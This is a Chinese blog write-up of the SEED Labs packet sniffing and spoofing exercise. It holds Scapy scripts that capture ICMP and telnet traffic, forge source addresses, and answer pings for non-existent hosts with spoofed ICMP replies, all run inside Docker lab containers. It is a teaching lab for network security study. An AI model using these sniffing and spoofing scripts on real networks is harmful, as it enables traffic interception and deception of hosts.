seedlab:Packet Sniffifing and Spoofifing Lab

最新推荐文章于 2024-01-07 11:05:24 发布
最新推荐文章于 2024-01-07 11:05:24 发布
阅读量328 收藏 2
点赞数 2
文章标签: 网络 tcp/ip 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gungir_/article/details/126873320
版权
本文档详细介绍了如何使用Scapy库在Docker环境中进行网络包嗅探和欺骗。实验涵盖了ICMP包的嗅探与伪造,特定IP和端口的TCP报文监听,特定子网报文的捕获,以及Traceroute的实现。通过这些任务,展示了网络攻击者可能使用的手段,如地址伪装和ICMP欺骗。
摘要由CSDN通过智能技术生成

Packet Sniffifing and Spoofifing Lab

Environment Setup

启动容器

dcbuild
dcup

ifconfig查看网桥信息
创建的网桥是br-93554a9ea50b
![[Pasted image 20220815154902.png]]

Lab Task Set 1: Using Scapy to Sniff and Spoof Packets

进入容器
![[Pasted image 20220815155342.png]]

Task 1.1: Sniffifing Packets

Task 1.1A

进入攻击主机
编写sniffer.py放入volumes(需要修改成自己的网桥)

#!/usr/bin/env python3
from scapy.all import *

def print_pkt(pkt):
    pkt.show()
    
pkt = sniff(iface='br-93554a9ea50b', filter='icmp', prn=print_pkt)

攻击主机开始监听
![[Pasted image 20220815160552.png]]

被攻击主机ping百度
![[Pasted image 20220815160643.png]]

可以在攻击主机中看到数据包
![[Pasted image 20220815160729.png]]

Task 1.1B
  • 只捕获ICMP包
#!/usr/bin/env python3
from scapy.all import *

def print_pkt(pkt):
    return pkt.summary()
    
pkt = sniff(iface='br-93554a9ea50b', filter='icmp', prn=print_pkt)
print(pkt)

攻击主机运行sniffer.py开始监听
被攻击主机ping www.baidu.com
![[Pasted image 20220815161332.png]]

  • 监听来自特定IP地址,端口为23的TCP报文
#!/usr/bin/env python3
from scapy.all import *

def print_pkt(pkt):
    return pkt.summary()
    
pkt = sniff(iface='br-93554a9ea50b', filter='tcp and src 10.9.0.10 and dst port 23', prn=print_pkt)
print(pkt)

开始监听后在被攻击主机上使用telnet连接网关
![[Pasted image 20220815162151.png]]

![[Pasted image 20220815162136.png]]

  • 监听某子网的报文
#!/usr/bin/env python3
from scapy.all import *

def print_pkt(pkt):
    return pkt.summary()
    
pkt = sniff(iface='br-93554a9ea50b', filter='net 128.230.0.0/16', prn=print_pkt)
print(pkt)

攻击主机开始监听后在被攻击主机上ping128.230.0.1
![[Pasted image 20220815162524.png]]

Task 1.2: Spoofifing ICMP Packets

修改sniffer.py并在攻击者主机上运行
![[Pasted image 20220815163000.png]]

在被攻击主机中创建spoof_icmp.py文件,并运行

from scapy.all import *

a=IP()
a.src='10.0.2.4'
a.dst='10.9.0.1'
b=ICMP()
p=a/b
send(p)

![[Pasted image 20220815164000.png]]

可以发现地址被伪造了
![[Pasted image 20220815164135.png]]

Task 1.3: Traceroute

在被监听主机上创建try_ttl.py文件

#!/usr/bin/env python3  
from scapy.all import *  
for i in range(1,30):   
    a=IP()  
    a.dst='202.108.2.5'  
    a.ttl=i  
    b=ICMP()  
    p=a/b  
    send(p)

在wireshark中开启监听网桥
被监听主机运行try_ttl.py后查看wireshark
在这里插入图片描述

Task 1.4: Sniffifing and-then Spoofifing

在被监听主机中ping 以下三个地址
发现只有第三个可以ping通

ping 1.2.3.4 # a non-existing host on the Internet

ping 10.9.0.99 # a non-existing host on the LAN

ping 8.8.8.8 # an existing host on the Internet

在attacker主机中创建sniff_and_spoof.py并运行

#!/usr/bin/env python3  
from scapy.all import *  
def spoof_pkt(pkt):  
    if ICMP in pkt and pkt[ICMP].type == 8:  
        print("Original Packet.......")  
        print("Source IP : ", pkt[IP].src)  
        print("Destination IP:", pkt[IP].dst)  
  
        ip = IP(src=pkt[IP].dst, dst=pkt[IP].src, ihl=pkt[IP].ihl)  
        icmp = ICMP(type=0, id=pkt[ICMP].id, seq=pkt[ICMP].seq)  
        data = pkt[Raw].load  
        newpkt = ip/icmp/data  
  
        print("Spoofed Packet.......")  
       print("Source IP : ", newpkt[IP].src)  
        print("Destination IP : ", newpkt[IP].dst)  
        send(newpkt, verbose=0)  
  
pkt = sniff(iface='br-93554a9ea50b', filter='icmp', prn=spoof_pkt)

再次使用被监听主机ping 刚刚的三个地址
1.2.3.4可以ping通
![[Pasted image 20220815170733.png]]

10.9.0.99无法ping通
![[Pasted image 20220815170822.png]]

8.8.8.8 可以ping通,存在DUP标志
![[Pasted image 20220815170900.png]]

gungir_
关注
信息安全 SEED Lab10 Packet Sniffing and Spoofing Lab
crazyliu的博客
07-07 5817
这个实验是关于数据包的嗅探与伪造 1. Task Set 1 这部分主要是利用工具来嗅探数据包,这里用的是 scapy。 可以用下面的命令进行安装。 sudo pip3 install scapy 简单测试一下,构造了一个IP数据包并打印其的一些信息 [07/02/21]seed@VM:~/.../Lab10$ sudo python3 Python 3.5.2 (default, Nov 17 2016, 17:05:23) [GCC 5.4.0 20160609] on linux Type "he
ORA-12571: TNS:packet writer failure
he91-com
07-05 2735
ORA-12571:TNS:包复写器失效 2007-05-28 22:04 ORA-12571:TNS:包复写器失效 近日一直在做Oracle数据库的搭建(入门),在搭建过程中遇到“ORA-12571:TNS:包复写器失效”这个错误,产生错误的情况如下: 情况1: 环境配置:Win2000 Server、Oracle 9i 描述:机器安装完系统,安装Oracle9i,成功...
Packet_Sniffing_and_Spoofing
03-30
Packet_Sniffing_and_Spoofing
SeedLabPacket Sniffing and Spoofing Lab
cold_windx的博客
08-24 3698
本节实验要求:借助Scapy库,实现网络流量的捕获与伪造。
ScapySniffingAndSpoofing:此存储库包含SEED Labs使用Scapy进行嗅探和欺骗的源代码
04-08
#SEED实验室嗅探和欺骗实验室您好,您可能是从“代码入口”博客来到这里的。 此存储库包含我发表过文章的“嗅探和欺骗SEED实验室”实验室报告的源代码。
Lab1 Packet Sniffing and Spoofing Lab
qq_43599063的博客
07-06 3330
@[TOC]Packet Sniffing and Spoofing Lab 实验网站连接link2.1先把docker-compose.yml放到虚拟机的某个文件夹下。 2.2 然后再文件所在的目录下输入命令运行 docker-compose up -d就能直接配置并在后台运行。1.编写python代码进行嗅探数据包。 2.找到自己的interface。 3.给sniffer文件赋予权限,并以管理员身份运行文件。在运行时要再启动一个终端进行ping10.9.0.5,来获取10.9.0.5发来的icmp
SEED Labs 2.0】Virtual Private Network (V*N) Lab
Chenyang的博客
08-31 4726
本文为 SEED Labs 2.0 - Virtual Private Network (V*N) Lab 的实验记录。本实验较为简单。
Packet-Sniffing-and-spoofing:数据包嗅探和欺骗
05-31
数据包嗅探和欺骗 任务 1 a:从教程下载 sniffex.c 程序 b:捕获两个特定主机之间的 ICMP 数据包。 捕获目标端口范围为 10 - 100 的 TCP 数据包。... 任务 2 a:ICMP 欺骗程序 b:欺骗 ICMP Echo 请求。...
PacketTracer LAB
11-08
**PacketTracer LAB** PacketTracer是一款由Cisco Systems开发的强大网络模拟软件,它主要用于教育和培训,特别是对于那些想要获取Cisco Certified Network Associate (CCNA)认证的学员来说,这是一个不可或缺的...
SEED-Lab) Sniffing_Spoofing
lunan的博客
02-17 5740
SEED-Lab) Sniffing_Spoofing 欢迎大家访问我的GitHub博客 https://lunan0320.cn 文章目录(SEED-Lab) Sniffing_Spoofing一、实验目标二、实验原理2.1 Sniffing原理2.2 Spoofing原理三、实验器材四、Lab Task Set 1: Using Tools to Sniff and Spoof Packets4.1 Task1.1 Sniffing Packets4.1.1 Task1.1A4.1.2 Task
seedlab:Virtual Private Network Lab
gungir_的博客
09-15 2815
seedlab中的Virtual Private Network Lab实验
SEED Labs 2.0】V*N Tunneling Lab
Chenyang的博客
08-27 4919
本文为 SEED Labs 2.0 - V*N Tunneling Lab 的实验记录。本实验工作量较大,但难度不大,重点在于搞清是谁发给谁,走的什么路径。另外,本次实验由于网络中的设备较多,修改了环境变量方便分清哪个窗口是哪个设备。这样操作起来就方便多了。...
seed lab 2020 packet sniffing and spoofing lab
weixin_44005234的博客
10-17 4023
本实验均使用 python3 scapy 完成 本文可能使用到的同时发包和收包的程序如下: 1. import subprocess 2. from time import * 3. from sys import * 4. 5. sniffer=subprocess.Popen(['python3','tcp_sniffer.py']) 6. sleep(0.5) 7. sender=subprocess.run(args=['python3','tcp_sender.py'],
V*N Lab: The Container Version(SEED Labs)
l4kjih3gfe2dcba1的博客
08-16 3815
没啥好总结的,task9让我心力交瘁 二编:yw yyds!!!
SEEDLab Crypto_TLS 实验报告
C_Ronaldo__的博客
12-25 3729
Transport Layer Security (TLS) Lab 文章目录Transport Layer Security (TLS) Labtask1:TLS ClientTask 1.a: TLS handshakeQuestion task1:TLS Client Task 1.a: TLS handshake 使用如下代码,为了打印出TLS使用的各个算法,需要在实验手册代码基础上加上pprint.pprint(ssock.cipher()) #!/usr/bin/python3 import s
seedlab:V** tunneling The Container Version
gungir_的博客
09-15 719
seedlab中的vpn tunneling lab
SeedLab1: Sniffing & Spoofing Lab
Rachel_IS的博客
01-19 2992
本学期开始两门课的SeedLab之旅~ 网上能参考的资料比较少…要自己加油鸭 ???? Sniffing & Spoofing Lab 两种语言:Python(Scapy)、C(pcap) 两种机制:Sniff、spoof Task 1.1A 抄一抄示例代码,scapy的show()函数能直接打印出以太网、IP、ICMP、DNS等信息(需要root权限运行): 不用root权限时,会在socket系统调用的地方发生权限错误: Task 1.1B 2 更改过滤条件,指定目的IP和目的端口号即可
网络攻防--嗅探与欺骗
最新发布
qq_64389397的博客
01-07 1158
包嗅探和欺骗是网络安全中的两个重要概念;它们是网络通信中的两大威胁。能够理解这两种威胁对于理解网络中的安全措施至关重要。有许多包嗅探和欺骗工具,如Wireshark、Tcpdump、Netwox等。其中一些工具被安全专家以及攻击者广泛使用。能够使用这些工具对学生来说很重要,但对于网络安全课程的学生来说,更重要的是了解这些工具是如何工作的,即包嗅探和欺骗是如何在软件中实现的。本实验的目标是让学生掌握大多数嗅探和欺骗工具的基本技术。
网络攻防技术】实验九——嗅探与欺骗实验
qq_45755706的博客
03-01 9007
文章目录一、实验题目二、实验步骤及结果Lab Task Set 1: Using Scapy to Sniff and Spoof PacketTask 1.1ATask 1.1BTask 1.2Task1.3Task 1.4Task Set 2:Writing Programs to Sniff and Spoof PacketsTask 2.1: Writing Packet Sniffing ProgramTask 2.1B: Writing Filters.Task 2.1C: Sniffing P
packet sniffing and spoofing lab
03-16
包嗅探和欺骗实验是网络安全领域中的重要技能。嗅探是指监听网络中的数据包,以查找有用信息。欺骗是指伪造网络中的数据包,以达到某种目的。在实验室中,通常使用特定工具来模拟嗅探和欺骗攻击,以帮助学习如何防御这些攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值